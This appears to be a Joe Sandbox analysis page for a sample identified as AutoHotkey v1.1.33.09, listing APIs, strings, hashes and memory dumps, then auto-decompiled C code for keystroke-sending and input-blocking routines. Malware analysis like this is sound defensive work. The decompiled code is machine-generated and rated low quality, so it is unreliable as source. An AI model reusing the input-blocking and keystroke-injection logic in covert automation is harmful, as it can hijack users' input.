GetModuleFileNameW.KERNEL32(00000000,?,00007FFE,?,?,?,?,?,?,?,?,?), ref: 0041D73D

Strings

.ahk, xrefs: 0041D4E3
hh.exe, xrefs: 0041D5E7
Max, xrefs: 0041D5D2
!F@, xrefs: 0041D646
AutoHotkey v1.1.33.09, xrefs: 0041D6E8
"ms-its:%s::/docs/Welcome.htm", xrefs: 0041D5B0
%s\%s - %s, xrefs: 0041D6EF
\AutoHotkey.chm, xrefs: 0041D584

Memory Dump Source

Source File: 0000000E.00000002.829171872.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.829161738.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829265052.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829286847.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829298897.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829305543.00000000004D9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829312384.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_nMv8.jbxd

Similarity

API ID: File$AttributesName_wcsrchr$Module$FullPath__snwprintf
String ID: !F@$"ms-its:%s::/docs/Welcome.htm"$%s\%s - %s$.ahk$AutoHotkey v1.1.33.09$Max$\AutoHotkey.chm$hh.exe
API String ID: 4064454537-369356909
Opcode ID: 5bf711fba7a8bfe0e71a8cca90551296c34e22845c6a30718283f7a30898b37b
Instruction ID: 29f5ac482b1fe68235666bd415f8ec0332bdb13a6e9b3a3ae96237a0d85fa0f8
Opcode Fuzzy Hash: 5bf711fba7a8bfe0e71a8cca90551296c34e22845c6a30718283f7a30898b37b
Instruction Fuzzy Hash: F79109B1A0074157D720EB688C45BE773A4EF91314F04463EFA598A2D1FB7CE548C7AA

Uniqueness

Uniqueness Score: -1.00%

Function 0041DD70, Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 177
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_malloc.LIBCMT ref: 0041DD83

Part of subcall function 0049853E: __FF_MSGBANNER.LIBCMT ref: 00498557
Part of subcall function 0049853E: __NMSG_WRITE.LIBCMT ref: 0049855E
Part of subcall function 0049853E: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,0049E811,004011D4,00000001,004011D4,?,0049D07D,00000018,004CE9B0,0000000C,0049D10D), ref: 00498583

SetTimer.USER32(?,0000000E,04EF6D80,00403D70), ref: 0041DDCA
_free.LIBCMT ref: 0041DEFC

Strings

0RK, xrefs: 0041DE82
@cM, xrefs: 0041DF85

Memory Dump Source

Source File: 0000000E.00000002.829171872.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.829161738.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829265052.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829286847.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829298897.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829305543.00000000004D9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829312384.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_nMv8.jbxd

Similarity

API ID: AllocateHeapTimer_free_malloc
String ID: 0RK$@cM
API String ID: 92111083-1109199464
Opcode ID: 8a79bd9180ec00fc1a932452648c98db52ca91cd55f8d7aadacd55f1086babab
Instruction ID: f619462d7b8e9393d2fc4c5bc8fa687bd652c330b6997c9d95e2a4fc7c153b29
Opcode Fuzzy Hash: 8a79bd9180ec00fc1a932452648c98db52ca91cd55f8d7aadacd55f1086babab
Instruction Fuzzy Hash: DB719FB0A062409FD710EF2AEC84EA17BE5FB19314F5544BFE1088B3A2D7759880CF19

Uniqueness

Uniqueness Score: -1.00%

Function 00404090, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindCloseChangeNotification.KERNEL32(?,00000000,0J,00000000,004AABF8,000000FF,0041ED55), ref: 004040FA
_free.LIBCMT ref: 00404115

Strings

0J, xrefs: 004040A5

Memory Dump Source

Source File: 0000000E.00000002.829171872.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.829161738.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829265052.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829286847.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829298897.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829305543.00000000004D9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829312384.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_nMv8.jbxd

Similarity

API ID: ChangeCloseFindNotification_free
String ID: 0J
API String ID: 2993663561-3766476707
Opcode ID: 1f79ed1d841f3a68e0f6ab9c01960da3ba8ab970fa90f51354fbbf3bcca2d6b4
Instruction ID: 3aa64f7a465c7e406b653edfbf6c143d1183e9a7a514ea076d1f4fcc2d3eaedc
Opcode Fuzzy Hash: 1f79ed1d841f3a68e0f6ab9c01960da3ba8ab970fa90f51354fbbf3bcca2d6b4
Instruction Fuzzy Hash: 84118BB1500B519BD720CF18C948B17B7E4FB49720F548A2EE0A697BD0C378B8408B49

Uniqueness

Uniqueness Score: -1.00%

Function 0044ACB0, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 60
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetCurrentDirectoryW.KERNEL32(00000000,?,?,?,?,0042A9D0), ref: 0044ACE6

Strings

:, xrefs: 0044ACD4

Memory Dump Source

Source File: 0000000E.00000002.829171872.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.829161738.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829265052.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829286847.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829298897.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829305543.00000000004D9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829312384.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_nMv8.jbxd

Similarity

API ID: CurrentDirectory
String ID: :
API String ID: 1611563598-336475711
Opcode ID: 4e4e90640c43fc116cdf5c469440afbb0592297fe6da4095e75ffdbf127e6faa
Instruction ID: 90f519f8a0a8c456d684136568f3ca2365b621ba2a360c8d17d40947c2faf077
Opcode Fuzzy Hash: 4e4e90640c43fc116cdf5c469440afbb0592297fe6da4095e75ffdbf127e6faa
Instruction Fuzzy Hash: D2112775B4430036F731E714AC82BAB37A1AF85B18F54856FF554562E0D6BC5885C34F

Uniqueness

Uniqueness Score: -1.00%

Function 0049FF6C, Relevance: 1.6, APIs: 1, Instructions: 52
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000008,0047E61E,00000000,?,0049E85B,004011D4,0047E61E,00000000,00000000,00000000,?,0049C414,00000001,00000214,?,0049D9F0), ref: 0049FFAF

Part of subcall function 0049C9A2: __getptd_noexit.LIBCMT ref: 0049C9A2

Memory Dump Source

Source File: 0000000E.00000002.829171872.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.829161738.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829265052.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829286847.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829298897.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829305543.00000000004D9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829312384.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_nMv8.jbxd

Similarity

API ID: AllocateHeap__getptd_noexit
String ID:
API String ID: 328603210-0
Opcode ID: b47d6fd274576b1314829e5dfbb09a9ff42cbadfc258b5736f83f76971318a0e
Instruction ID: 44fba749607cebc3cb768d942e1eec12a5c8b45b7b2eee97799391049c57de62
Opcode Fuzzy Hash: b47d6fd274576b1314829e5dfbb09a9ff42cbadfc258b5736f83f76971318a0e
Instruction Fuzzy Hash: 6801D4312116169EEF289F25DC84B6B3F58AF82768F00453BF80ACB6D4CB38D844C688

Uniqueness

Uniqueness Score: -1.00%

Function 0047BE50, Relevance: 1.5, APIs: 1, Instructions: 31
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_malloc.LIBCMT ref: 0047BE5D

Part of subcall function 0049853E: __FF_MSGBANNER.LIBCMT ref: 00498557
Part of subcall function 0049853E: __NMSG_WRITE.LIBCMT ref: 0049855E
Part of subcall function 0049853E: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,0049E811,004011D4,00000001,004011D4,?,0049D07D,00000018,004CE9B0,0000000C,0049D10D), ref: 00498583

Memory Dump Source

Source File: 0000000E.00000002.829171872.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.829161738.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829265052.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829286847.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829298897.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829305543.00000000004D9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829312384.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_nMv8.jbxd

Similarity

API ID: AllocateHeap_malloc
String ID:
API String ID: 501242067-0
Opcode ID: f16fe3cd4e18f176f58e68642328e05db91e4352e6904cdcffe913629cb06bdf
Instruction ID: 6729d72069637157612124dbb416f6cef28ddbd7ff3cf3db686fea960b590c95
Opcode Fuzzy Hash: f16fe3cd4e18f176f58e68642328e05db91e4352e6904cdcffe913629cb06bdf
Instruction Fuzzy Hash: B9F05E716006028FDB64CB29E890B6BB3E6FB90314B54C52ED44E83B54E734E845CA44

Uniqueness

Uniqueness Score: -1.00%

Function 0047B7B0, Relevance: 1.5, APIs: 1, Instructions: 27
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00498C86: _malloc.LIBCMT ref: 00498CA0

_malloc.LIBCMT ref: 0047B7CD

Part of subcall function 0049853E: __FF_MSGBANNER.LIBCMT ref: 00498557
Part of subcall function 0049853E: __NMSG_WRITE.LIBCMT ref: 0049855E
Part of subcall function 0049853E: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,0049E811,004011D4,00000001,004011D4,?,0049D07D,00000018,004CE9B0,0000000C,0049D10D), ref: 00498583

Memory Dump Source

Source File: 0000000E.00000002.829171872.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.829161738.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829265052.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829286847.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829298897.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829305543.00000000004D9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829312384.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_nMv8.jbxd

Similarity

API ID: _malloc$AllocateHeap
String ID:
API String ID: 680241177-0
Opcode ID: 929daf9a85510ef19c341d5c0449a4c9dcafcf142846c65f097a978b3abbc1af
Instruction ID: a1734069c662139ed388a5c6cc8b0d5655a5b5a76106219f41ab1ec136b18426
Opcode Fuzzy Hash: 929daf9a85510ef19c341d5c0449a4c9dcafcf142846c65f097a978b3abbc1af
Instruction Fuzzy Hash: F5E09BB190672147D7605F29BC017977BD0AF00764F05843FF88986301EB78D48487C6

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00414200, Relevance: 143.1, APIs: 66, Strings: 15, Instructions: 1339
threadkeyboardCOMMONCrypto

Download Yara Rule

C-Code - Quality: 20%

			E00414200(void* __fp0, signed int _a4, signed int _a7, int _a8, DWORD* _a12, struct HWND__* _a16) {
				signed int _v5;
				signed int _v6;
				signed int _v7;
				signed int _v11;
				signed char _v12;
				signed char _v13;
				signed char _v14;
				signed int _v18;
				char _v19;
				struct HWND__* _v24;
				signed int _v28;
				char _v29;
				struct HWND__* _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				struct HWND__* _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				long _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				intOrPtr _v96;
				long _v100;
				char _v104;
				char _v118;
				signed short _v120;
				struct tagMSG _v148;
				struct HWND__* _v184;
				signed int _v196;
				void* _v212;
				struct HWND__* __ebx;
				signed int __edi;
				struct HWND__* __esi;
				void* __ebp;
				signed int _t373;
				intOrPtr _t374;
				DWORD* _t375;
				signed int _t377;
				struct HWND__* _t378;
				signed char _t385;
				char _t388;
				intOrPtr _t390;
				signed int _t394;
				signed short _t395;
				signed short _t396;
				signed short _t397;
				signed short _t398;
				signed short _t399;
				signed short _t400;
				signed short _t401;
				signed short _t402;
				signed char _t403;
				int _t407;
				long _t409;
				signed int _t411;
				signed char _t415;
				signed short _t416;
				long _t419;
				signed int _t423;
				signed char _t425;
				long _t428;
				signed char _t430;
				signed char _t444;
				int _t452;
				signed int _t453;
				signed char _t454;
				signed int _t460;
				signed int _t462;
				void* _t466;
				void* _t468;
				long _t469;
				void* _t477;
				long _t481;
				signed char _t482;
				signed int _t484;
				struct HWND__* _t485;
				long _t487;
				long _t489;
				signed int _t490;
				signed int _t491;
				signed int _t493;
				signed short _t494;
				signed short _t496;
				signed int _t497;
				void* _t506;
				void* _t507;
				signed int _t508;
				int _t510;
				long _t522;
				signed char _t525;
				signed char _t527;
				signed char _t528;
				signed int _t543;
				struct HWND__* _t544;
				signed short* _t546;
				signed char _t553;
				signed char _t566;
				signed int _t568;
				long _t569;
				DWORD* _t570;
				signed int _t572;
				signed int _t575;
				signed int _t576;
				signed short* _t582;
				void* _t585;
				signed int _t588;
				void* _t589;
				void* _t627;

				_t627 = __fp0;
				_t568 = _a4;
				if( *_t568 == 0) {
					L297:
					return _t373;
				}
				_t508 = _a8;
				_t575 =  *0x4d3b04; // 0x3215110
				_t374 =  *0x4d9228; // 0x17cd9ae
				_v44 = _t575;
				_v96 = _t374;
				if(_t508 != 0) {
					L4:
					 *0x4d660b = 0;
					__eflags = _t508;
					if(_t508 != 0) {
						L7:
						_t375 = _a12;
						_t559 =  *(_t575 + 0x64);
						_v80 =  *(_t575 + 0x5c);
						_v84 =  *(_t575 + 0x64);
						if(_t375 == 1 || _t375 == 3) {
							if(E0040E0E0() != 0 || _t508 == 0 && E0040E150() != 0 && E0047E9B0(L"{Click", _t568) != 0) {
								__eflags = _a12 - 3;
								if(_a12 != 3) {
									_t377 = 0;
									_a12 = 0;
									__eflags =  *(_t575 + 0x5c);
									if( *(_t575 + 0x5c) < 0) {
										__eflags =  *(_t575 + 0x64);
										if( *(_t575 + 0x64) < 0) {
											_t377 = 0xffffffff;
											__eflags = 0xffffffff;
										}
									}
									 *(_t575 + 0x64) = _t377;
									 *(_t575 + 0x5c) = 0xffffffff;
								} else {
									_a12 = 2;
								}
							} else {
								_a12 = 1;
							}
						}
						_t569 = 0;
						_v19 = 0;
						if(_a16 == 0) {
							__eflags =  *0x4d91ee & 0x000000c0;
							if(( *0x4d91ee & 0x000000c0) == 0) {
								L45:
								_t378 = GetForegroundWindow();
								_t569 = 0;
								__eflags = _t378;
								if(_t378 != 0) {
									_t484 = GetWindowThreadProcessId(_t378, 0);
									_t559 =  &_v196;
									_t569 = _t484;
									_v196 = 0x30;
									__imp__GetGUIThreadInfo(_t569,  &_v196);
									__eflags = _t484;
									if(_t484 != 0) {
										_t485 = _v184;
										__eflags = _t485;
										if(_t485 != 0) {
											_t569 = GetWindowThreadProcessId(_t485, 0);
										}
									}
								}
								goto L26;
							}
							_t487 = GetTickCount();
							__eflags = _t487 -  *0x4d91e4 - 0x32;
							if(_t487 -  *0x4d91e4 >= 0x32) {
								goto L45;
							}
							__eflags = _a12 - 2;
							if(_a12 == 2) {
								goto L45;
							}
							__eflags =  *0x4d660b;
							if( *0x4d660b != 0) {
								goto L45;
							}
							__eflags = _t508 - 2;
							if(_t508 == 2) {
								goto L45;
							}
							__eflags =  *0x4d93d6;
							if( *0x4d93d6 == 0) {
								goto L45;
							}
							_t489 = GetCurrentThreadId();
							__eflags = _t489 -  *0x4d86f4;
							if(_t489 !=  *0x4d86f4) {
								goto L45;
							}
							_t490 = _a4;
							__eflags = _t508;
							if(_t508 == 0) {
								_t491 = E004052FA(_t490, L"Ll");
								__eflags = _t491;
								if(_t491 == 0) {
									goto L45;
								} else {
									while(1) {
										_t493 = E004052FA(_t491 + 2, L"{}");
										__eflags = _t493;
										if(_t493 == 0) {
											goto L37;
										}
										__eflags =  *_t493 - 0x7b;
										if( *_t493 == 0x7b) {
											while(1) {
												L37:
												_t494 = GetAsyncKeyState(0x5b);
												_t559 = 0x8000;
												__eflags = 0x00008000 & _t494;
												if((0x00008000 & _t494) != 0) {
													goto L39;
												}
												_t496 = GetAsyncKeyState(0x5c);
												__eflags = 0x00008000 & _t496;
												if((0x00008000 & _t496) == 0) {
													goto L45;
												}
												L39:
												_push(1);
												_push(0x8000012f);
												 *0x4d3a0c = 0;
												L00401430(_t559, _t627);
												_t585 = _t585 + 8;
												 *0x4d3a0c = 1;
											}
										}
										_t491 = E004052FA(_t493, L"Ll");
										__eflags = _t491;
										if(_t491 != 0) {
											continue;
										}
										goto L45;
									}
									goto L37;
								}
							}
							_t497 = E004052FA(_t490, L"Ll");
							_t497 = _t497 & 0xffffff00 | _t497 != 0x00000000;
							if((_t497 & 0xffffff00 | _t497 != 0x00000000) == 0) {
								goto L45;
							}
							goto L37;
						} else {
							_t522 = GetWindowThreadProcessId(_a16, 0);
							_v100 = _t522;
							if(_t522 != 0 && _t522 !=  *0x4d86f4) {
								if(E00483760(_a16) == 0) {
									_v19 = AttachThreadInput( *0x4d86f4, _t522, 1) != 0;
									_t569 = _t522;
								}
								_t575 = _v44;
							}
							L26:
							 *0x4d6630 = GetKeyboardLayout(_t569);
							 *0x4d662c = E00418920(0, _t379);
							_t509 = E00418250(_t575, 1);
							 *0x4d7f56 =  *0x4d7f56 & _t509;
							_t588 = _t585 + 8;
							_v12 = _t509;
							if( *0x4d7828 == 0) {
								__eflags = GetTickCount() -  *0x4d91e4 -  *0x4d3a04; // 0x32
								if(__eflags >= 0) {
									_v6 = 0;
									_t385 = _v6;
								} else {
									_t482 =  *0x4d91ee; // 0x0
									_t385 = _t482 & _t509;
									_v6 = _t385;
								}
								_v14 = 0;
							} else {
								_t553 =  *0x4d76f5;
								_t559 =  *0x4d76f7;
								_t385 = _t553 & _t559;
								_v6 = _t559;
								_v14 =  !_t553 & _t559;
							}
							_t525 =  *0x4d7f43 &  !_t385 & _t509;
							_t388 =  *0x4d660b; // 0x0
							 *0x4d7f43 = _t525;
							if(_t388 == 0) {
								_v7 = 0;
								_v11 = _t525;
							} else {
								_v7 =  !_t525 & _t509;
								_v11 = _t509;
							}
							if( *((char*)(_t575 + 0xf3)) == 0 || _t388 != 0 || _a8 == 2) {
								_v72 = 0;
							} else {
								_t481 = E00417A90(0x14, 2);
								_t509 = _v12;
								_t588 = _t588 + 4;
								_v72 = _t481;
							}
							_t576 = _a12;
							 *0x4d7f7c = _t576;
							if(_t576 != 0) {
								if(_t576 != 1) {
									_t477 = 0x2ee0;
									 *0x4d6620 = 0x5dc;
								} else {
									_t477 = 0x36b0;
									 *0x4d6620 = 0x1f4;
								}
								E004A6280(_t477);
								 *0x4d6628 = _t588;
								 *0x4d6613 = _t509;
								 *0x4d6614 = 0x80000000;
								 *0x4d6618 = 0x80000000;
								 *0x4d6612 = 0;
								 *0x4d6624 = 0;
								 *0x4d6611 = 0;
								 *0x4d6610 = 1;
							}
							_v29 =  *0x4d7f0d;
							_t390 =  *0x4d3b14; // 0xb
							if(_t390 == 8 || _t390 == 0xa) {
								if(_t576 != 0 || _a16 != _t576) {
									goto L82;
								} else {
									_v12 = 1;
									__imp__BlockInput(1);
									 *0x4d7f0d = 1;
									goto L71;
								}
							} else {
								L82:
								_v12 = 0;
								L71:
								_t526 = _a4;
								_v5 = 0;
								if( *_a4 == 0) {
									L231:
									_t570 = 0;
									__eflags =  *0x4d7f7c;
									if( *0x4d7f7c == 0) {
										__eflags =  *0x4d7828;
										if( *0x4d7828 == 0) {
											__eflags =  *0x4d3a04 - _t570; // 0x32
											if(__eflags < 0) {
												L246:
												_t527 = _v6;
												L247:
												_t528 = _t527 |  *0x4d7f56;
												__eflags =  *0x4d660b;
												if( *0x4d660b == 0) {
													_t394 =  !_v14 & _t528 | _v11;
													__eflags = _t394;
													_v24 = _t394;
												} else {
													_t566 = _v6;
													_t430 = _t528 ^ _t566;
													_t509 =  !(_t430 & _t566) & _v11 | _t430 & _t528;
													_v24 =  !(_t430 & _t566) & _v11 | _t430 & _t528;
												}
												__eflags =  *0x4d7828 - _t570;
												if( *0x4d7828 == _t570) {
													_a7 = 0;
													_t395 = GetAsyncKeyState(0xa0);
													__eflags = 0x00008000 & _t395;
													if((0x00008000 & _t395) != 0) {
														_a7 = 0x10;
													}
													_t396 = GetAsyncKeyState(0xa1);
													__eflags = 0x00008000 & _t396;
													if((0x00008000 & _t396) != 0) {
														_t323 =  &_a7;
														 *_t323 = _a7 | 0x00000020;
														__eflags =  *_t323;
													}
													_t397 = GetAsyncKeyState(0xa2);
													__eflags = 0x00008000 & _t397;
													if((0x00008000 & _t397) != 0) {
														_t327 =  &_a7;
														 *_t327 = _a7 | 0x00000001;
														__eflags =  *_t327;
													}
													_t398 = GetAsyncKeyState(0xa3);
													__eflags = 0x00008000 & _t398;
													if((0x00008000 & _t398) != 0) {
														_t331 =  &_a7;
														 *_t331 = _a7 | 0x00000002;
														__eflags =  *_t331;
													}
													_t399 = GetAsyncKeyState(0xa4);
													__eflags = 0x00008000 & _t399;
													if((0x00008000 & _t399) != 0) {
														_t335 =  &_a7;
														 *_t335 = _a7 | 0x00000004;
														__eflags =  *_t335;
													}
													_t400 = GetAsyncKeyState(0xa5);
													__eflags = 0x00008000 & _t400;
													if((0x00008000 & _t400) != 0) {
														_t339 =  &_a7;
														 *_t339 = _a7 | 0x00000008;
														__eflags =  *_t339;
													}
													_t401 = GetAsyncKeyState(0x5b);
													__eflags = 0x00008000 & _t401;
													if((0x00008000 & _t401) != 0) {
														_t343 =  &_a7;
														 *_t343 = _a7 | 0x00000040;
														__eflags =  *_t343;
													}
													_t402 = GetAsyncKeyState(0x5c);
													__eflags = 0x00008000 & _t402;
													if((0x00008000 & _t402) != 0) {
														_t347 =  &_a7;
														 *_t347 = _a7 | 0x00000080;
														__eflags =  *_t347;
													}
													__eflags =  *0x4d7828 - _t570;
													if( *0x4d7828 != _t570) {
														_t509 =  !_a7 &  *0x4d76f5;
														__eflags = _t509;
														if(_t509 != 0) {
															_t425 =  !_t509;
															 *0x4d76f5 =  *0x4d76f5 & _t425;
															 *0x4d76f6 =  *0x4d76f6 & _t425;
															 *0x4d76f7 =  *0x4d76f7 & _t425;
															E00418380( *0x4d76f7 & _t425, 0x4d7720);
															_t428 =  *0x4d6604; // 0x0
															__eflags = _t428 - _t570;
															if(_t428 != _t570) {
																__eflags =  *(_t428 + 8) & _t509;
																if(( *(_t428 + 8) & _t509) != 0) {
																	 *0x4d6604 = _t570;
																}
															}
														}
													}
													_t403 = _a7;
												} else {
													_t403 =  *0x4d76f5;
												}
												_t559 = (_t403 |  *0x4d7718) & 0x000000ff;
												E00417BA0(_t509, 0xffc3d44d, _t627, _v24, (_t403 |  *0x4d7718) & 0x000000ff, _a16, 1, 1);
												_t589 = _t588 + 0x14;
												_t510 = 1;
												_t570 = 0;
												__eflags = 0;
												L275:
												__eflags =  *0x4d7828 - _t570;
												if( *0x4d7828 != _t570) {
													_t423 =  *0x4d76f6 &  !(( *0x4d76f6 ^  *0x4d76f5) &  *0x4d76f6);
													__eflags = _t423;
													 *0x4d76f6 = _t423;
												}
												__eflags = _v72 - _t510;
												if(_v72 == _t510) {
													_t415 = GetKeyState(0x14);
													__eflags = _t415 & 0x00000001;
													if((_t415 & 0x00000001) == 0) {
														_t416 = GetKeyState(0x14);
														_t559 = 0x8000;
														__eflags = 0x00008000 & _t416;
														if((0x00008000 & _t416) != 0) {
															E00415DA0(_t627, _t510, 0x14, _t570, _t570, _t570, 0xffc3d44d);
															_t589 = _t589 + 0x18;
														}
														E00415DA0(_t627, 2, 0x14, _t570, _t570, _t570, 0xffc3d44d);
														_t589 = _t589 + 0x18;
														_t419 = GetWindowThreadProcessId(GetForegroundWindow(), _t570);
														__eflags = _t419 -  *0x4d86f4;
														if(_t419 ==  *0x4d86f4) {
															_push(_t510);
															_push(0xffffffff);
															 *0x4d3a0c = _t570;
															L00401430(_t559, _t627);
															_t589 = _t589 + 8;
															 *0x4d3a0c = _t510;
														}
													}
												}
												__eflags = _v19;
												if(_v19 != 0) {
													AttachThreadInput( *0x4d86f4, _v100, _t570);
												}
												__eflags = _v12;
												if(_v12 != 0) {
													__eflags = _v29;
													if(_v29 == 0) {
														__imp__BlockInput(_t570);
														 *0x4d7f0d = 0;
													}
												}
												_t407 = _a12;
												__eflags = _t407 - _t570;
												if(_t407 != _t570) {
													__eflags = _t407 - _t510;
													if(_t407 != _t510) {
														goto L296;
													}
													_t409 = GetWindowThreadProcessId(GetForegroundWindow(), _t570);
													__eflags = _t409 -  *0x4d86f4;
													if(_t409 !=  *0x4d86f4) {
														goto L296;
													}
													_push(_t510);
													_push(0xffffffff);
													 *0x4d3a0c = _t570;
													L00401430(_t559, _t627);
													 *0x4d3a0c = _t510;
													goto L295;
												} else {
													__eflags =  *0x4d9228 - _v96; // 0x17cd9ae
													if(__eflags == 0) {
														L296:
														_t373 = _v44;
														 *(_t373 + 0x5c) = _v80;
														 *(_t373 + 0x64) = _v84;
														goto L297;
													}
													_t411 = E00403B20();
													__eflags = _t411;
													if(_t411 == 0) {
														goto L296;
													}
													_push(_t510);
													_push(0xffffffff);
													L00401430(_t565, _t627);
													L295:
													goto L296;
												}
											}
											__eflags = GetTickCount() -  *0x4d91e4 -  *0x4d3a04; // 0x32
											if(__eflags < 0) {
												goto L246;
											}
											_t527 = 0;
											goto L247;
										}
										_t527 =  *0x4d76f7;
										goto L247;
									}
									__eflags =  *0x4d6611;
									_a4 = 0xffffffff;
									if( *0x4d6611 == 0) {
										__eflags =  *0x4d6624 - _t570; // 0x0
										if(__eflags > 0) {
											__eflags =  *0x4d660b;
											if( *0x4d660b == 0) {
												_t559 = _v6 & 0x000000ff;
												_t444 =  !(_v14 & 0x000000ff) & _v6 & 0x000000ff;
												__eflags = _t444;
											} else {
												_t444 = 0;
											}
											_v24 = _t444 |  *0x4d7f56 | _v11;
											E00417BA0(_t509, 0xffc3d44d, _t627, _v24,  *0x4d6613 & 0x000000ff, 0, 1, 1);
											_t526 =  &_a4;
											E00417650(_t509, _v24, 0xffc3d44d, _t627,  &_a4, _v24);
											_t588 = _t588 + 0x1c;
											_t570 = 0;
											__eflags = 0;
										}
									}
									_t510 = 1;
									asm("sbb eax, eax");
									__eflags =  *0x4d6620 - ( ~( *0x4d7f7c - 1) & 0x000003e8) + 0x1f4; // 0x0
									if(__eflags > 0) {
										_t559 =  *0x4d6628; // 0x0
										E004985DD(_t559);
										_t588 = _t588 + 4;
									}
									 *0x4d7f7c = _t570;
									E004177A0(_t526, _a4);
									_t589 = _t588 + 4;
									goto L275;
								} else {
									do {
										_v13 = 0;
										if( *0x4d7f7c == 0) {
											_t469 = GetTickCount();
											_t559 =  *0x4d3b04; // 0x3215110
											if(_t469 -  *0x4d922c >  *((intOrPtr*)(_t559 + 0xd8))) {
												if(PeekMessageW( &_v148, 0, 0, 0, 0) != 0) {
													_push(1);
													_push(0xffffffff);
													 *0x4d3a0c = 0;
													L00401430(_t559, _t627);
													_t588 = _t588 + 8;
													 *0x4d3a0c = 1;
												}
												 *0x4d922c = GetTickCount();
											}
										}
										_t572 = _a8;
										if(_t572 != 0) {
											__eflags = _t572 - 2;
											if(_t572 != 2) {
												L222:
												__eflags = _v5 | _v11;
												if((_v5 | _v11) == 0) {
													L225:
													_t452 = 0;
													__eflags = 0;
													L226:
													_t543 =  *0x4d6630; // 0x0
													_t453 = E00418DE0( &_v5,  *_a4, _t543, _t452);
													_t588 = _t588 + 8;
													_v18 = _t453;
													__eflags = _t453;
													if(_t453 == 0) {
														L220:
														_t544 = _a16;
														_t454 = _v5;
														__eflags = _t544;
														if(_t544 == 0) {
															__eflags = _t454 | _v11;
															_t559 = _a4;
															E00415870( *_a4, 1, _t627, (_t454 | _v11) & 0x000000ff);
															_t588 = _t588 + 4;
														} else {
